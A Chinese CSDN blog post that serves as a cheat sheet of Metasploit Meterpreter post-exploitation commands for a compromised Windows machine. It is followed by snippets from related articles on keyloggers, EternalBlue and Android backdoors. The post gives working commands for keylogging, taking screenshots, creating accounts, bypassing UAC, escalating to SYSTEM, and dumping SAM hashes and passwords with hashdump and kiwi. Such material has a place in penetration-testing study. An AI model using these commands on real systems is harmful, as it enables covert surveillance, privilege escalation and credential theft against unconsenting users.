Metasploit后渗透|总结|键盘记录|提权

最新推荐文章于 2024-05-28 22:25:32 发布
最新推荐文章于 2024-05-28 22:25:32 发布
阅读量980 收藏 9
点赞数 2
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60115503/article/details/125358769
版权

Metasploit提供了一个非常强大的后渗透工具————Meterpreter,该工具具有多重功能,使后续的渗透入侵变得更容易。 获取目标机的Meterpreter Shell后,就进入了Metasploit最精彩的后期渗透利用阶段,后期渗透模块有200多个,Meterpreter有以下优势

查看靶机文件和目录

ls

查看靶机相关系统信息

sysinfo

查看攻击机或者监控机的文件和目录

lls

查看当前攻击或者监控机器的目录路径

getlwd

查看当前靶机的目录位置

pwd/getwd

删除靶机中的目录文件

rmdir XXX

在靶机创建目录

mkdir XXX

切换攻击机的目录

lcd

查看并编辑靶机上的文件内容

edit

删除靶机文件

del {文件名} || rm {文件名}

上传文件

upload XXX.xxx

下载文件

download xxx

屏幕快照

screenshot

启动键盘记录[当启动此项目后靶机打字输入的信息将被记录下来]

keyscan_start

导出键盘记录

keyscan_dump

查看靶机已经存在的用户 meterpreter中输入

run post/windows/gather/enum_logged_on_users

创建新账户 

run getgui -u 用户名 -p 密码

注意:[-]Inssufficient privileges,account was not be created看到这个提示就需要先提权(获取system)

绕过UAC提权

use exploit/windows/local/ask

UAC

        用户账户控制

                用户账户控制(User Account Control,简写作UAC)是微软公司在其windows Vista及更高版本操作系统中采用的一种控制机制,其原理是通知用户是否对应用程序使用磁盘驱动和系统文件授权,已达到帮助阻止恶意程序(有时也称为"恶意软件")损坏系统的效果

查看靶机当前权限 

getuid

尝试直接获取系统权限

getsystem

将当前会话切换至后台

background

使用msf模块提权

在msf终端搜索 search bypassuac

例如exploit/windows/local/bypassuac_dotnet_profiler[使用此模块需要配置session]

抓取自动登录账户密码

run windows/gather/credentials/windows_autologin

导出SAM数据库中的本地用户账户[需要得到system权限]

run post/windows/gather/smart_hashdump

使用hashdump获得密码

run hashdump

使用kiwi获得密码

load kiwi  加载kiwi模块

creds_all获取密码

QiaN_djx
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux下的键盘记录
fengling132的专栏
05-02 1645
安装: wget http://logkeys.googlecode.com/files/logkeys-0.1.1a.tar.gz tar -xf logkeys-0.1.XX.tar.gz cd logkeys-0.1.XX ./configure make make check make install   使用: logkeys -s -u -o log.txt
远程控制+屏幕监视+键盘记录
06-10
专业超级远程控制,超强的管理功能,适用于电脑爱好者、家庭、学校、公司、单位远程管理计算机!
Windows登录的明文密码如何存储?使用hashdump抓取的密文包含哪些部分?
最新发布
m0_71474212的博客
05-28 671
它是一种质询/应答身份验证协议,用于在网络环境中验证用户的身份。NTLM协议既可以为工作组中的机器提供身份验证,也可以用于域环境身份验证。在NTLM认证的过程中,客户端回和服务器进行一系列的交互,以便于验证用户的身份;
[MSF]server/capture/http_javascript_keylogger键盘记录
weixin_33943347的博客
09-09 97
server/capture/http_javascript_keylogger DEMO使用的官方的效果图: 使用方法: show options 看看 msf auxiliary(server/capture/http_javascript_keylogger) > options Module options (auxiliary/server/capt...
3.6 Meterpreter 键盘记录
qq_55202378的博客
07-23 3440
meterpreter
python渗透测试入门之键盘记录
ailx10
06-24 355
近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》,书中一共24个实验,今天复现第19个实验( 键盘记录),我的测试环境是windows虚拟机+conda开发环境+python3.7。这个实验非常有趣,在windows环境下,可以记录不同进程下键盘的记录,比如我在notepad记事本上敲下“您好”,程序运行就会得到“ninhao”这样的拼音,这种程序一般会被杀毒软件拦截,因此做实...
web渗透测试-从入门到放弃-04XSS-键盘记录
lx1315998513的博客
12-15 356
案例-xss键盘记录 1.在实验前,先了解一下什么是跨域 http:// www . xyz.com : 8080 / script/test.js 协议 子域名 主域名 端口 资源地址 当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域 我们把不同的域之间请求数据的操作,成为跨域操作。 下面的地址同源吗?...
meterpreter + 键盘记录
大方子
10-27 4872
分享下自己的关于【metterpreter + 键盘记录】的学习 这里是使用ms17_010打入目标主机,具体就不进行描述。 ms17_010 成功的话就是SYSTEM权限 如果我们要对管理员的键盘进行记录的话,就需要把进程迁移到Administrator的进程 在system权限下,是无法捕获Administrator的键盘记录 我们ps找到合适的进程进...
meterpreter获取系统信息和键盘记录
天元喜羊羊的博客
04-20 6093
刚下载了BT5,今天就用BT5来测试。 输入ps,图片上面没有显示,不知道为什么。 我在XP上打开了记事本程序,下面再ps一下,就显示notepad.exe了。 在下面的图中,看到notepad的pid是1024,输入命令 migrate 1024 就将回话迁移到notepad上面去了。 然
Metasploit后门攻击android
2301_77778745的博客
04-26 416
之后攻击便完成了,这时候返回一个meterpreter可以执行各种命令,可以通过’?‘来进行辅助获得更多的帮助信息。接着在终端里输入/etc/init.d/apache2 start 启动apache服务。/var/www/html是生成木马的路径,也是kali 2.0的web服务器路径。注意要把LHOST 和LPORT 设置成刚才配置木马程序的IP和端口。确认无误后,便可以开始监听,使用。LHOST对应的是本机的ip地址。LPORT对于你要监听的端口。
【tools】Meterpreter 操作汇总
热门推荐
qq_21193587的博客
06-04 3万+
Meterpreter 介绍 Meterpreter 号称“黑客瑞士军刀”,Meterpreter 是 Metasploit 框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后能够返回一个我们控制通道,例如利用远程过程带哦用 RPC 服务的一个漏洞,当漏洞被触发后,我们选择 Meterpreter 作为攻击载荷,就能够获得目标系统上的一个 Meterpreter Shell 连接。Meterpreter 是 Metasploit 框架的一个扩展模块,可以调用 Metasploit
使用Meterperter会话获取目标屏幕与键盘记录
sGanYu
09-09 2277
使用MS08-067漏洞开启·Meterpreter会话 截图目标主机 使用screenshot命令获取目标截图,这里是被默认保存至/root/桌面/ijROqnkE.jpeg 使用sysinfo即可获取系统运行的平台 获取目标主机键盘记录 先使用ps命令查看运行在目标系统的进程,获得system、cmd.exe、explorer.exe等在内的数十个进程 输入migrate命令将meterpreter会话迁移至explorer.exe(1384)进程中 ...
metasploit渗透测试指南--第六章--meterpreter--学习笔记
weixin_45018333的博客
08-17 669
从之前的学习明白了一件事情就是,渗透攻击的本质是识别并充分利用目标系统中存在的安全漏洞。 本章学习meterpreter,通常作为攻击载荷使用,来提升后渗透攻击阶段的能力。 使用meterpreter的前提,触发漏洞并选择meterpreter作为攻击载荷并返回一个meterpreter shell 1.攻陷Windows XP虚拟机: 输入: nmap -sT -A -P0 192.168.22...
msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)
m0_61506558的博客
09-01 4564
创建之前要是系统权限(getuid查看),要不然会出现[-] Insufficient privileges, account was not be created. 看到这个提示就需要先提权(获取到system)输入 getsystem就好了。获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。meterpreter中输入:run post/windows/gather/enum_logged_on_users。...
【内网安全】——meterpreter使用攻略
qq_53058639的博客
01-26 878
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
MS17-010漏洞复现(永恒之蓝)
m0_73263892的博客
06-23 130
攻击机:kali靶机:win 7二 复现步骤1 进入msfconsole2 查找ms17-0103 使用辅助模块进行扫描use 34 查看选项5 设置目标主机IP6 进行扫描run发现目标主机可能存在ms17-010漏洞7 使用exploit模块use 08 查看选项9 设置目标主机IP10 开始攻击run返回一个独立shell 、
Kali Linux 网络安全渗透测试
06-02
为什么学网络安全?1. 市场巨大每年各安全厂商收入高达400亿左右,随着5G的发展,万物互联时代,市场将进一步扩大。2. 薪资高网安人才的匮乏,用人开出招聘薪资往往高于求职者的预期。3. 靠能力说话在网络安全专业,专业技能竞争力要远高于学历本身。在网安专业只看能力不看学历也成了大家公认的原则。 网络安全未来10年的发展前景现代人的生活与网络息息相关,个人、企业信息的安全显示尤为重要,2018年报告的信息安全事件比2017年有所增加,一年几千万次。应对网络安全挑战,已越来越被重视。不管你是否从事网络安全行业相关工作,信息安全都显得越来越重要。 注意:视频教学内容仅用于网络安全渗透测试。其他行为,自己承担相应的责任,与作者无关。 
Metasploit学习笔记(六)——Meterpreter后渗透之Hash攻击提权(包含Mimikatz)
Zichel77的博客
10-09 2525
针对WIN7,还是用永恒之蓝。
渗透Meterpreter常用命令记录
Sp4rkW的博客
12-18 9070
基本命令 命令 解释 background 将meterpreter终端隐藏在后台(快捷键ctrl+z) sessions 查看已经成功获得的会话,如果想继续与某会话交互,可以使用sessions -i 命令. quit 直接关闭当前的meterpreter会话,返回MSF终端. shell 获取目标系统的控制台shell. irb 在meterpret
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值